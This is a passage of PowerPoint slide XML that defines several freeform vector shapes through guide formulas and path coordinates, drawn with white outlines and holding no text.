                      <a:pt x="4" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="30"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36316" name="Freeform 48"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4408" y="3039"/>
                <a:ext cx="145" cy="44"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 145"/>
                  <a:gd name="T1" fmla="*/ 12 h 44"/>
                  <a:gd name="T2" fmla="*/ 5 w 145"/>
                  <a:gd name="T3" fmla="*/ 13 h 44"/>
                  <a:gd name="T4" fmla="*/ 8 w 145"/>
                  <a:gd name="T5" fmla="*/ 8 h 44"/>
                  <a:gd name="T6" fmla="*/ 10 w 145"/>
                  <a:gd name="T7" fmla="*/ 7 h 44"/>
                  <a:gd name="T8" fmla="*/ 11 w 145"/>
                  <a:gd name="T9" fmla="*/ 2 h 44"/>
                  <a:gd name="T10" fmla="*/ 14 w 145"/>
                  <a:gd name="T11" fmla="*/ 1 h 44"/>
                  <a:gd name="T12" fmla="*/ 21 w 145"/>
                  <a:gd name="T13" fmla="*/ 2 h 44"/>
                  <a:gd name="T14" fmla="*/ 27 w 145"/>
                  <a:gd name="T15" fmla="*/ 4 h 44"/>
                  <a:gd name="T16" fmla="*/ 28 w 145"/>
                  <a:gd name="T17" fmla="*/ 0 h 44"/>
                  <a:gd name="T18" fmla="*/ 34 w 145"/>
                  <a:gd name="T19" fmla="*/ 2 h 44"/>
                  <a:gd name="T20" fmla="*/ 40 w 145"/>
                  <a:gd name="T21" fmla="*/ 5 h 44"/>
                  <a:gd name="T22" fmla="*/ 44 w 145"/>
                  <a:gd name="T23" fmla="*/ 7 h 44"/>
                  <a:gd name="T24" fmla="*/ 50 w 145"/>
                  <a:gd name="T25" fmla="*/ 7 h 44"/>
                  <a:gd name="T26" fmla="*/ 54 w 145"/>
                  <a:gd name="T27" fmla="*/ 14 h 44"/>
                  <a:gd name="T28" fmla="*/ 63 w 145"/>
                  <a:gd name="T29" fmla="*/ 16 h 44"/>
                  <a:gd name="T30" fmla="*/ 77 w 145"/>
                  <a:gd name="T31" fmla="*/ 16 h 44"/>
                  <a:gd name="T32" fmla="*/ 83 w 145"/>
                  <a:gd name="T33" fmla="*/ 15 h 44"/>
                  <a:gd name="T34" fmla="*/ 86 w 145"/>
                  <a:gd name="T35" fmla="*/ 8 h 44"/>
                  <a:gd name="T36" fmla="*/ 91 w 145"/>
                  <a:gd name="T37" fmla="*/ 10 h 44"/>
                  <a:gd name="T38" fmla="*/ 98 w 145"/>
                  <a:gd name="T39" fmla="*/ 14 h 44"/>
                  <a:gd name="T40" fmla="*/ 107 w 145"/>
                  <a:gd name="T41" fmla="*/ 15 h 44"/>
                  <a:gd name="T42" fmla="*/ 115 w 145"/>
                  <a:gd name="T43" fmla="*/ 18 h 44"/>
                  <a:gd name="T44" fmla="*/ 116 w 145"/>
                  <a:gd name="T45" fmla="*/ 23 h 44"/>
                  <a:gd name="T46" fmla="*/ 119 w 145"/>
                  <a:gd name="T47" fmla="*/ 27 h 44"/>
                  <a:gd name="T48" fmla="*/ 128 w 145"/>
                  <a:gd name="T49" fmla="*/ 30 h 44"/>
                  <a:gd name="T50" fmla="*/ 136 w 145"/>
                  <a:gd name="T51" fmla="*/ 29 h 44"/>
                  <a:gd name="T52" fmla="*/ 143 w 145"/>
                  <a:gd name="T53" fmla="*/ 31 h 44"/>
                  <a:gd name="T54" fmla="*/ 142 w 145"/>
                  <a:gd name="T55" fmla="*/ 35 h 44"/>
                  <a:gd name="T56" fmla="*/ 145 w 145"/>
                  <a:gd name="T57" fmla="*/ 44 h 44"/>
                  <a:gd name="T58" fmla="*/ 136 w 145"/>
                  <a:gd name="T59" fmla="*/ 41 h 44"/>
                  <a:gd name="T60" fmla="*/ 125 w 145"/>
                  <a:gd name="T61" fmla="*/ 37 h 44"/>
                  <a:gd name="T62" fmla="*/ 117 w 145"/>
                  <a:gd name="T63" fmla="*/ 39 h 44"/>
                  <a:gd name="T64" fmla="*/ 110 w 145"/>
                  <a:gd name="T65" fmla="*/ 39 h 44"/>
                  <a:gd name="T66" fmla="*/ 89 w 145"/>
                  <a:gd name="T67" fmla="*/ 37 h 44"/>
                  <a:gd name="T68" fmla="*/ 77 w 145"/>
                  <a:gd name="T69" fmla="*/ 32 h 44"/>
                  <a:gd name="T70" fmla="*/ 61 w 145"/>
                  <a:gd name="T71" fmla="*/ 27 h 44"/>
                  <a:gd name="T72" fmla="*/ 51 w 145"/>
                  <a:gd name="T73" fmla="*/ 29 h 44"/>
                  <a:gd name="T74" fmla="*/ 41 w 145"/>
                  <a:gd name="T75" fmla="*/ 28 h 44"/>
                  <a:gd name="T76" fmla="*/ 32 w 145"/>
                  <a:gd name="T77" fmla="*/ 24 h 44"/>
                  <a:gd name="T78" fmla="*/ 18 w 145"/>
                  <a:gd name="T79" fmla="*/ 23 h 44"/>
                  <a:gd name="T80" fmla="*/ 22 w 145"/>
                  <a:gd name="T81" fmla="*/ 18 h 44"/>
                  <a:gd name="T82" fmla="*/ 15 w 145"/>
                  <a:gd name="T83" fmla="*/ 16 h 44"/>
                  <a:gd name="T84" fmla="*/ 9 w 145"/>
                  <a:gd name="T85" fmla="*/ 14 h 44"/>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45"/>
                  <a:gd name="T130" fmla="*/ 0 h 44"/>
                  <a:gd name="T131" fmla="*/ 145 w 145"/>
                  <a:gd name="T132" fmla="*/ 44 h 44"/>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45" h="44">
                    <a:moveTo>
                      <a:pt x="0" y="14"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="14"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36317" name="Freeform 49"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4408" y="2969"/>
                <a:ext cx="23" cy="25"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 22 w 23"/>
                  <a:gd name="T1" fmla="*/ 25 h 25"/>
                  <a:gd name="T2" fmla="*/ 16 w 23"/>
                  <a:gd name="T3" fmla="*/ 22 h 25"/>
                  <a:gd name="T4" fmla="*/ 13 w 23"/>
                  <a:gd name="T5" fmla="*/ 20 h 25"/>
                  <a:gd name="T6" fmla="*/ 12 w 23"/>
                  <a:gd name="T7" fmla="*/ 18 h 25"/>
                  <a:gd name="T8" fmla="*/ 11 w 23"/>
                  <a:gd name="T9" fmla="*/ 15 h 25"/>
                  <a:gd name="T10" fmla="*/ 10 w 23"/>
                  <a:gd name="T11" fmla="*/ 12 h 25"/>
                  <a:gd name="T12" fmla="*/ 7 w 23"/>
                  <a:gd name="T13" fmla="*/ 10 h 25"/>
                  <a:gd name="T14" fmla="*/ 4 w 23"/>
                  <a:gd name="T15" fmla="*/ 9 h 25"/>
                  <a:gd name="T16" fmla="*/ 1 w 23"/>
                  <a:gd name="T17" fmla="*/ 9 h 25"/>
                  <a:gd name="T18" fmla="*/ 0 w 23"/>
                  <a:gd name="T19" fmla="*/ 8 h 25"/>
                  <a:gd name="T20" fmla="*/ 2 w 23"/>
                  <a:gd name="T21" fmla="*/ 3 h 25"/>
                  <a:gd name="T22" fmla="*/ 4 w 23"/>
                  <a:gd name="T23" fmla="*/ 2 h 25"/>
                  <a:gd name="T24" fmla="*/ 8 w 23"/>
                  <a:gd name="T25" fmla="*/ 6 h 25"/>
                  <a:gd name="T26" fmla="*/ 9 w 23"/>
                  <a:gd name="T27" fmla="*/ 2 h 25"/>
                  <a:gd name="T28" fmla="*/ 11 w 23"/>
                  <a:gd name="T29" fmla="*/ 0 h 25"/>
                  <a:gd name="T30" fmla="*/ 11 w 23"/>
                  <a:gd name="T31" fmla="*/ 3 h 25"/>
                  <a:gd name="T32" fmla="*/ 14 w 23"/>
                  <a:gd name="T33" fmla="*/ 9 h 25"/>
                  <a:gd name="T34" fmla="*/ 18 w 23"/>
                  <a:gd name="T35" fmla="*/ 15 h 25"/>
                  <a:gd name="T36" fmla="*/ 23 w 23"/>
                  <a:gd name="T37" fmla="*/ 18 h 25"/>
                  <a:gd name="T38" fmla="*/ 21 w 23"/>
                  <a:gd name="T39" fmla="*/ 19 h 25"/>
                  <a:gd name="T40" fmla="*/ 21 w 23"/>
                  <a:gd name="T41" fmla="*/ 21 h 25"/>
                  <a:gd name="T42" fmla="*/ 22 w 23"/>
                  <a:gd name="T43" fmla="*/ 25 h 25"/>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23"/>
                  <a:gd name="T67" fmla="*/ 0 h 25"/>
                  <a:gd name="T68" fmla="*/ 23 w 23"/>
                  <a:gd name="T69" fmla="*/ 25 h 25"/>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23" h="25">
                    <a:moveTo>
                      <a:pt x="22" y="25"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="16" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="25"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36318" name="Freeform 50"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4761" y="2914"/>
                <a:ext cx="20" cy="46"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 20"/>
                  <a:gd name="T1" fmla="*/ 30 h 46"/>
                  <a:gd name="T2" fmla="*/ 3 w 20"/>
                  <a:gd name="T3" fmla="*/ 29 h 46"/>
                  <a:gd name="T4" fmla="*/ 0 w 20"/>
                  <a:gd name="T5" fmla="*/ 21 h 46"/>
                  <a:gd name="T6" fmla="*/ 2 w 20"/>
                  <a:gd name="T7" fmla="*/ 17 h 46"/>
                  <a:gd name="T8" fmla="*/ 1 w 20"/>
                  <a:gd name="T9" fmla="*/ 16 h 46"/>
                  <a:gd name="T10" fmla="*/ 0 w 20"/>
                  <a:gd name="T11" fmla="*/ 14 h 46"/>
                  <a:gd name="T12" fmla="*/ 0 w 20"/>
                  <a:gd name="T13" fmla="*/ 12 h 46"/>
                  <a:gd name="T14" fmla="*/ 2 w 20"/>
                  <a:gd name="T15" fmla="*/ 5 h 46"/>
                  <a:gd name="T16" fmla="*/ 6 w 20"/>
                  <a:gd name="T17" fmla="*/ 0 h 46"/>
                  <a:gd name="T18" fmla="*/ 8 w 20"/>
                  <a:gd name="T19" fmla="*/ 2 h 46"/>
                  <a:gd name="T20" fmla="*/ 9 w 20"/>
                  <a:gd name="T21" fmla="*/ 5 h 46"/>
                  <a:gd name="T22" fmla="*/ 9 w 20"/>
                  <a:gd name="T23" fmla="*/ 7 h 46"/>
                  <a:gd name="T24" fmla="*/ 7 w 20"/>
                  <a:gd name="T25" fmla="*/ 9 h 46"/>
                  <a:gd name="T26" fmla="*/ 4 w 20"/>
                  <a:gd name="T27" fmla="*/ 15 h 46"/>
                  <a:gd name="T28" fmla="*/ 5 w 20"/>
                  <a:gd name="T29" fmla="*/ 17 h 46"/>
                  <a:gd name="T30" fmla="*/ 6 w 20"/>
                  <a:gd name="T31" fmla="*/ 18 h 46"/>
                  <a:gd name="T32" fmla="*/ 7 w 20"/>
                  <a:gd name="T33" fmla="*/ 17 h 46"/>
                  <a:gd name="T34" fmla="*/ 10 w 20"/>
                  <a:gd name="T35" fmla="*/ 14 h 46"/>
                  <a:gd name="T36" fmla="*/ 11 w 20"/>
                  <a:gd name="T37" fmla="*/ 11 h 46"/>
                  <a:gd name="T38" fmla="*/ 12 w 20"/>
                  <a:gd name="T39" fmla="*/ 10 h 46"/>
                  <a:gd name="T40" fmla="*/ 18 w 20"/>
                  <a:gd name="T41" fmla="*/ 7 h 46"/>
                  <a:gd name="T42" fmla="*/ 19 w 20"/>
                  <a:gd name="T43" fmla="*/ 8 h 46"/>
                  <a:gd name="T44" fmla="*/ 18 w 20"/>
                  <a:gd name="T45" fmla="*/ 9 h 46"/>
                  <a:gd name="T46" fmla="*/ 19 w 20"/>
                  <a:gd name="T47" fmla="*/ 13 h 46"/>
                  <a:gd name="T48" fmla="*/ 17 w 20"/>
                  <a:gd name="T49" fmla="*/ 15 h 46"/>
                  <a:gd name="T50" fmla="*/ 13 w 20"/>
                  <a:gd name="T51" fmla="*/ 17 h 46"/>
                  <a:gd name="T52" fmla="*/ 12 w 20"/>
                  <a:gd name="T53" fmla="*/ 20 h 46"/>
                  <a:gd name="T54" fmla="*/ 13 w 20"/>
                  <a:gd name="T55" fmla="*/ 20 h 46"/>
                  <a:gd name="T56" fmla="*/ 16 w 20"/>
                  <a:gd name="T57" fmla="*/ 21 h 46"/>
                  <a:gd name="T58" fmla="*/ 19 w 20"/>
                  <a:gd name="T59" fmla="*/ 23 h 46"/>
                  <a:gd name="T60" fmla="*/ 19 w 20"/>
                  <a:gd name="T61" fmla="*/ 24 h 46"/>
                  <a:gd name="T62" fmla="*/ 20 w 20"/>
                  <a:gd name="T63" fmla="*/ 26 h 46"/>
                  <a:gd name="T64" fmla="*/ 15 w 20"/>
                  <a:gd name="T65" fmla="*/ 25 h 46"/>
                  <a:gd name="T66" fmla="*/ 12 w 20"/>
                  <a:gd name="T67" fmla="*/ 24 h 46"/>
                  <a:gd name="T68" fmla="*/ 10 w 20"/>
                  <a:gd name="T69" fmla="*/ 24 h 46"/>
                  <a:gd name="T70" fmla="*/ 8 w 20"/>
                  <a:gd name="T71" fmla="*/ 25 h 46"/>
                  <a:gd name="T72" fmla="*/ 7 w 20"/>
                  <a:gd name="T73" fmla="*/ 28 h 46"/>
                  <a:gd name="T74" fmla="*/ 7 w 20"/>
                  <a:gd name="T75" fmla="*/ 30 h 46"/>
                  <a:gd name="T76" fmla="*/ 8 w 20"/>
                  <a:gd name="T77" fmla="*/ 35 h 46"/>
                  <a:gd name="T78" fmla="*/ 11 w 20"/>
                  <a:gd name="T79" fmla="*/ 39 h 46"/>
                  <a:gd name="T80" fmla="*/ 14 w 20"/>
                  <a:gd name="T81" fmla="*/ 42 h 46"/>
                  <a:gd name="T82" fmla="*/ 15 w 20"/>
                  <a:gd name="T83" fmla="*/ 44 h 46"/>
                  <a:gd name="T84" fmla="*/ 14 w 20"/>
                  <a:gd name="T85" fmla="*/ 46 h 46"/>
                  <a:gd name="T86" fmla="*/ 12 w 20"/>
                  <a:gd name="T87" fmla="*/ 44 h 46"/>
                  <a:gd name="T88" fmla="*/ 7 w 20"/>
                  <a:gd name="T89" fmla="*/ 40 h 46"/>
                  <a:gd name="T90" fmla="*/ 3 w 20"/>
                  <a:gd name="T91" fmla="*/ 34 h 46"/>
                  <a:gd name="T92" fmla="*/ 3 w 20"/>
                  <a:gd name="T93" fmla="*/ 32 h 46"/>
                  <a:gd name="T94" fmla="*/ 3 w 20"/>
                  <a:gd name="T95" fmla="*/ 30 h 4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0"/>
                  <a:gd name="T145" fmla="*/ 0 h 46"/>
                  <a:gd name="T146" fmla="*/ 20 w 20"/>
                  <a:gd name="T147" fmla="*/ 46 h 4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0" h="46">
                    <a:moveTo>
                      <a:pt x="3" y="30"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="30"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36319" name="Freeform 51"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4250" y="2855"/>
                <a:ext cx="170" cy="185"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 131 w 170"/>
